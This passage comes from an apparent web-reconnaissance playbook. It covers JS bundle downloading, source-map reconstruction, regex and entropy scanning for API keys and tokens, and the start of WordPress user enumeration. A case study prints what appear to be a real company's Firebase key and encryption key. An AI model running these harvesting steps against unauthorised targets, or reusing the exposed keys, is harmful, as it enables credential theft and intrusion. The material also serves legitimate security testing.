&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Extract JWT tokens&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;jwts &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; re&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;findall(&lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;eyJ[a-zA-Z0-9_\-]{20,}\.[a-zA-Z0-9_\-]{20,}\.[a-zA-Z0-9_\-]{20,}&amp;#39;&lt;/span&gt;, log)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; j &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; &lt;span style="color:#99d1db"&gt;set&lt;/span&gt;(jwts):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;🔑 JWT: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;j[:&lt;span style="color:#ef9f76"&gt;80&lt;/span&gt;]&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;...&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Extract stack traces (system paths)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;paths &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#99d1db"&gt;set&lt;/span&gt;(re&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;findall(&lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:in |at )/(?:[a-zA-Z0-9_\-./]+\.(?:php|js|ts|py|rb))&amp;#39;&lt;/span&gt;, log))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; p &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; &lt;span style="color:#99d1db"&gt;sorted&lt;/span&gt;(paths):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;📁 &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;p&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;hr&gt;
&lt;h2 id="6-js-bundle--source-map-analysis" &gt;
&lt;div&gt;
&lt;a href="#6-js-bundle--source-map-analysis"&gt;
#
&lt;/a&gt;
6. JS BUNDLE &amp;amp; SOURCE MAP ANALYSIS
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="61-why-analyze-js-bundles" &gt;
&lt;div&gt;
&lt;a href="#61-why-analyze-js-bundles"&gt;
##
&lt;/a&gt;
6.1 Why Analyze JS Bundles
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Modern JavaScript bundles (Webpack, Vite, esbuild) often contain:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Hardcoded API keys and tokens&lt;/li&gt;
&lt;li&gt;Internal API URLs&lt;/li&gt;
&lt;li&gt;Firebase, Auth0, Supabase configurations&lt;/li&gt;
&lt;li&gt;Environment variables (VITE_*, REACT_APP_*, NEXT_PUBLIC_*); these prefixes mark values the build deliberately inlines into the bundle, so the finding is a server-side secret hidden behind a public prefix, not the prefix itself&lt;/li&gt;
&lt;li&gt;Internal routes&lt;/li&gt;
&lt;li&gt;Feature flags&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="62-bundle-download-and-analysis" &gt;
&lt;div&gt;
&lt;a href="#62-bundle-download-and-analysis"&gt;
##
&lt;/a&gt;
6.2 Bundle Download and Analysis
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Download the main HTML&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com&amp;#34;&lt;/span&gt; &amp;gt; index.html
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Extract JS bundle URLs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;grep -oP &lt;span style="color:#a6d189"&gt;&amp;#39;src=&amp;#34;[^&amp;#34;]*\.js&amp;#34;&amp;#39;&lt;/span&gt; index.html | cut -d&lt;span style="color:#a6d189"&gt;&amp;#39;&amp;#34;&amp;#39;&lt;/span&gt; -f2 | &lt;span style="color:#ca9ee6"&gt;while&lt;/span&gt; &lt;span style="color:#99d1db"&gt;read&lt;/span&gt; js; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$js&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &amp;gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;basename &lt;span style="color:#f2d5cf"&gt;$js&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Search for secrets in bundles&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;grep -rPn &lt;span style="color:#a6d189"&gt;&amp;#34;(?:apiKey|api_key|API_KEY|token|secret|password|clientId|client_id|auth0|firebase|supabase)[\&amp;#34;&amp;#39;]?\s*[:=]\s*[\&amp;#34;&amp;#39;][^\&amp;#34;&amp;#39;]{8,}&amp;#34;&lt;/span&gt; *.js
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="63-source-maps--source-code-reconstruction" &gt;
&lt;div&gt;
&lt;a href="#63-source-maps--source-code-reconstruction"&gt;
##
&lt;/a&gt;
6.3 Source Maps — Source Code Reconstruction
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Source maps (&lt;code&gt;.js.map&lt;/code&gt;) let you rebuild the original TypeScript/ES6 sources, exposing the whole frontend logic, but only when the bundler embedded &lt;code&gt;sourcesContent&lt;/code&gt; (the default for Vite and webpack); a map without it yields file names and line mappings, not code. Read the real map location from the bundle&amp;rsquo;s trailing &lt;code&gt;//# sourceMappingURL=&lt;/code&gt; comment rather than guessing file names.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Check if source maps are exposed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/assets/index-abc123.js.map&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/static/js/main.12345.js.map&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If they exist (HTTP 200), download and use:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# https://unminify.com or https://source-map-visualization.netlify.app&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: in an enterprise Angular admin SPA, two JS bundles of 250 KB each exposed:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Internal API URL (&lt;code&gt;apiv3.empresa.com.br&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Firebase API key (&lt;code&gt;AIzaSyCnQ7hg9qn8mrS3zSLX-xeXX3wKbuC2GXA&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Encryption keys (&lt;code&gt;AD5oDjsJaTJOzLe1Llj9mz&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Cloudinary upload endpoint&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Rate each item by what it actually unlocks: a Firebase web API key identifies the project and is meant to ship in the client, so its impact depends on what the Firestore/Realtime Database rules let an unauthenticated caller do; an encryption key or a Stripe &lt;code&gt;sk_live&lt;/code&gt; key in a bundle is a finding on its own.&lt;/p&gt;
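&lt;p&gt;The source-map steps above, worked as an added example (not code from the playbook): read the map URL the bundle itself declares, reject the SPA-fallback HTML that many hosts return with HTTP 200, and write the embedded &lt;code&gt;sourcesContent&lt;/code&gt; back out as a tree. The bundle URL, the map JSON and the traversal-style &lt;code&gt;sources&lt;/code&gt; entry are constructed samples; the &lt;code&gt;webpack:///&lt;/code&gt; prefix and &lt;code&gt;//# sourceMappingURL=&lt;/code&gt; comment are what real bundlers emit.&lt;/p&gt;

```python
import json
import os
import re
import tempfile
import urllib.parse

# Bundlers end the file with "//# sourceMappingURL=<ref>" (older tools used //@). Read it instead of guessing names.
SOURCE_MAPPING_RE = re.compile(r'^\s*//[#@]\s*sourceMappingURL=(\S+)\s*$', re.M)


def find_source_map_url(bundle_url, js_text):
    """Absolute URL of the map the bundle declares, a data: URI for inline maps, or None."""
    refs = SOURCE_MAPPING_RE.findall(js_text)
    if not refs:
        return None
    ref = refs[-1]  # the last declaration wins, as in browser devtools
    if ref.startswith("data:"):
        return ref
    return urllib.parse.urljoin(bundle_url, ref)


def looks_like_source_map(text):
    """HTTP 200 is not proof: many SPA hosts and CDNs answer unknown paths with index.html.
    A real map is a JSON object with version 3 and a sources array."""
    try:
        data = json.loads(text)
    except ValueError:
        return False
    return isinstance(data, dict) and data.get("version") == 3 and isinstance(data.get("sources"), list)


def safe_relative_path(source):
    """Map a source name such as webpack:///./src/api/client.ts onto a path that stays inside the
    output directory: strip the scheme, the query string, and any '.' or '..' segments."""
    name = re.sub(r'^[A-Za-z][A-Za-z0-9+.\-]*://', '', source)
    name = name.split("?", 1)[0]
    parts = [p for p in re.split(r'[\\/]+', name) if p not in ("", ".", "..")]
    return os.path.join(*parts) if parts else "unnamed"


def extract_sources(source_map, out_dir):
    """Write every original file whose text the bundler embedded in sourcesContent; return the
    paths written. Without sourcesContent the map only yields names and line mappings."""
    contents = source_map.get("sourcesContent") or []
    written = []
    for index, source in enumerate(source_map.get("sources", [])):
        if index >= len(contents) or contents[index] is None:
            continue
        dest = os.path.join(out_dir, safe_relative_path(source))
        os.makedirs(os.path.dirname(dest), exist_ok=True)
        with open(dest, "w", encoding="utf-8") as fh:
            fh.write(contents[index])
        written.append(dest)
    return written


# Constructed samples standing in for the downloaded bundle and its map.
SAMPLE_BUNDLE_JS = 'console.log("app");\n//# sourceMappingURL=index-abc123.js.map\n'
SAMPLE_MAP = {
    "version": 3,
    "file": "index-abc123.js",
    "sources": ["webpack:///./src/api/client.ts", "../../node_modules/evil.js"],
    "sourcesContent": [
        'export const API = "https://apiv3.internal.example";\n',
        "// a hostile sources entry must not escape the output directory\n",
    ],
    "names": [],
    "mappings": "AAAA",
}


def run_demo():
    """Offline end-to-end run: locate the map, validate it, reconstruct the tree."""
    map_url = find_source_map_url("https://target.com/assets/index-abc123.js", SAMPLE_BUNDLE_JS)
    map_text = json.dumps(SAMPLE_MAP)  # in the field: requests.get(map_url, timeout=30).text
    if not looks_like_source_map(map_text):
        return {"map_url": map_url, "files": [], "escaped": False}
    out_dir = tempfile.mkdtemp(prefix="srcmap_")
    written = extract_sources(json.loads(map_text), out_dir)
    root = os.path.realpath(out_dir) + os.sep
    return {
        "map_url": map_url,
        "files": [os.path.relpath(p, out_dir).replace(os.sep, "/") for p in written],
        "escaped": any(not os.path.realpath(p).startswith(root) for p in written),
    }


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

The path sanitiser matters in practice: `sources` is attacker-controlled text from the target, and a map that lists `../../.ssh/authorized_keys` would otherwise be written wherever the analyst unpacks it.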
&lt;h3 id="64-regex-patterns-for-secrets-in-js" &gt;
&lt;div&gt;
&lt;a href="#64-regex-patterns-for-secrets-in-js"&gt;
##
&lt;/a&gt;
6.4 Regex Patterns for Secrets in JS
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;re&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;patterns &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Firebase API Key&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;apiKey:\s*[&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;]([A-Za-z0-9_\-]{30,})&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;AWS Key&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:AKIA|ASIA)[A-Z0-9]&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{16}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Google API Key&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;AIza[0-9A-Za-z\-_]&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{35}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;JWT&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;eyJ[A-Za-z0-9_\-]{20,}\.[A-Za-z0-9_\-]{20,}\.[A-Za-z0-9_\-]{10,}&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Mercado Pago&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;APP_USR-[a-f0-9]{8,}&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Stripe&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:sk_live|pk_live)_[A-Za-z0-9]{24,}&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Auth0 Domain&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:domain|auth0_domain):\s*[&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;]([^&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;]+\.auth0\.com)&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Auth0 Client ID&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:client_id|clientId|AUTH0_CLIENT_ID):\s*[&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;]([^&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;]{20,})&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Supabase URL&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:supabaseUrl|SUPABASE_URL):\s*[&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;](https://[^&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;]+\.supabase\.co)&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Supabase Key&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:supabaseKey|anonKey|SUPABASE_ANON_KEY):\s*[&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;](eyJ[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+)&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Heroku&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;[0-9a-fA-F]&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{8}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;-[0-9a-fA-F]&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{4}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;-[0-9a-fA-F]&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{4}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;-[0-9a-fA-F]&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{4}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;-[0-9a-fA-F]&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{12}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Generic Secret&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:secret|password|token|key):\s*[&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;]([^&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;]{8,})&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;hr&gt;
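&lt;p&gt;Running the 6.4 patterns over a downloaded bundle (the grep in 6.2 done properly), as an added example rather than playbook code: the patterns are the page&amp;rsquo;s, tightened with capture groups and word boundaries so a hit returns the credential itself, results are deduplicated so a Firebase key is not reported three times, and the catch-all &amp;ldquo;Generic Secret&amp;rdquo; pattern is filtered by Shannon entropy to drop placeholders like &lt;code&gt;changeme&lt;/code&gt;. The 3.0 bits/char threshold and the bundle fragment are assumptions; the &lt;code&gt;AKIA&lt;/code&gt; value is AWS&amp;rsquo;s documentation example key and the &lt;code&gt;AIza&lt;/code&gt; value is made up to fit the 39-character format.&lt;/p&gt;

```python
import math
import re

# The page's 6.4 patterns, trimmed to the ones that fire on bundle text, with capture groups and
# word boundaries so a match returns the credential rather than the surrounding JS.
PATTERNS = {
    "Firebase API Key": r'apiKey:\s*["\']([A-Za-z0-9_\-]{30,})',
    "AWS Access Key ID": r'\b((?:AKIA|ASIA)[A-Z0-9]{16})\b',
    "Google API Key": r'\b(AIza[0-9A-Za-z\-_]{35})\b',
    "Stripe": r'\b((?:sk_live|pk_live)_[A-Za-z0-9]{24,})\b',
    "Supabase URL": r'(?:supabaseUrl|SUPABASE_URL):\s*["\'](https://[^"\']+\.supabase\.co)',
    "JWT": r'(eyJ[A-Za-z0-9_\-]{20,}\.[A-Za-z0-9_\-]{20,}\.[A-Za-z0-9_\-]{10,})',
    "Generic Secret": r'(?:secret|password|token|key)["\']?\s*[:=]\s*["\']([^"\']{8,})["\']',
}

# Heuristic threshold (assumption, tune per target): "changeme" scores 2.75 bits/char,
# random keys of 16+ characters score above 3.5.
GENERIC_MIN_ENTROPY = 3.0


def shannon_entropy(value):
    """Bits of entropy per character; used to drop placeholders that match the generic pattern."""
    if not value:
        return 0.0
    n = len(value)
    return -sum(value.count(c) / n * math.log2(value.count(c) / n) for c in set(value))


def scan_bundle(js_text, patterns=PATTERNS, min_entropy=GENERIC_MIN_ENTROPY):
    """Return [(pattern_name, value)] found in one bundle, deduplicated by value.
    Specific patterns run first, so a Firebase key is reported once under its own name even
    though the Google and generic patterns also match it."""
    findings = []
    seen = set()
    for name, pattern in patterns.items():
        for match in re.finditer(pattern, js_text):
            value = match.group(1)
            if value in seen:
                continue
            if name == "Generic Secret" and shannon_entropy(value) < min_entropy:
                continue  # low-entropy placeholder such as "changeme" or "xxxxxxxx"
            seen.add(value)
            findings.append((name, value))
    return findings


# Constructed minified-style bundle fragment (see lead-in for what the values are).
SAMPLE_BUNDLE = '''
const firebaseConfig={apiKey:"AIzaSyD-EXAMPLEexampleEXAMPLEexample012",authDomain:"demo.firebaseapp.com"};
const aws={accessKeyId:"AKIAIOSFODNN7EXAMPLE",region:"us-east-1"};
const sb={supabaseUrl:"https://xyzcompany.supabase.co"};
const cfg={token:"changeme",secret:"Zq8!kL2#vN9$pR4w"};
'''

if __name__ == "__main__":
    for name, value in scan_bundle(SAMPLE_BUNDLE):
        print(f"{name}: {value}")
```

Run it over every file the 6.2 loop downloaded; anything the specific patterns report is worth validating against the provider (an `AKIA` key with `aws sts get-caller-identity`, a Firebase key against the project's rules), while generic hits still need a human look.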
&lt;h2 id="7-wordpress-deep-dive" &gt;
&lt;div&gt;
&lt;a href="#7-wordpress-deep-dive"&gt;
#
&lt;/a&gt;
7. WORDPRESS DEEP DIVE
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="71-version-and-plugin-detection" &gt;
&lt;div&gt;
&lt;a href="#71-version-and-plugin-detection"&gt;
##
&lt;/a&gt;
7.1 Version and Plugin Detection
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Version in HTML&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com&amp;#34;&lt;/span&gt; | grep -oP &lt;span style="color:#a6d189"&gt;&amp;#39;generator&amp;#34;[^&amp;gt;]+content=&amp;#34;WordPress [0-9.]+&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Active plugins (via HTML)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com&amp;#34;&lt;/span&gt; | grep -oP &lt;span style="color:#a6d189"&gt;&amp;#34;wp-content/plugins/[^/&amp;#39;\&amp;#34;]+&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Themes&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com&amp;#34;&lt;/span&gt; | grep -oP &lt;span style="color:#a6d189"&gt;&amp;#34;wp-content/themes/[^/&amp;#39;\&amp;#34;]+&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Users via REST API&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com/wp-json/wp/v2/users&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Users via author ID (test 1-20)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; id in &lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;seq &lt;span style="color:#ef9f76"&gt;1&lt;/span&gt; 20&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
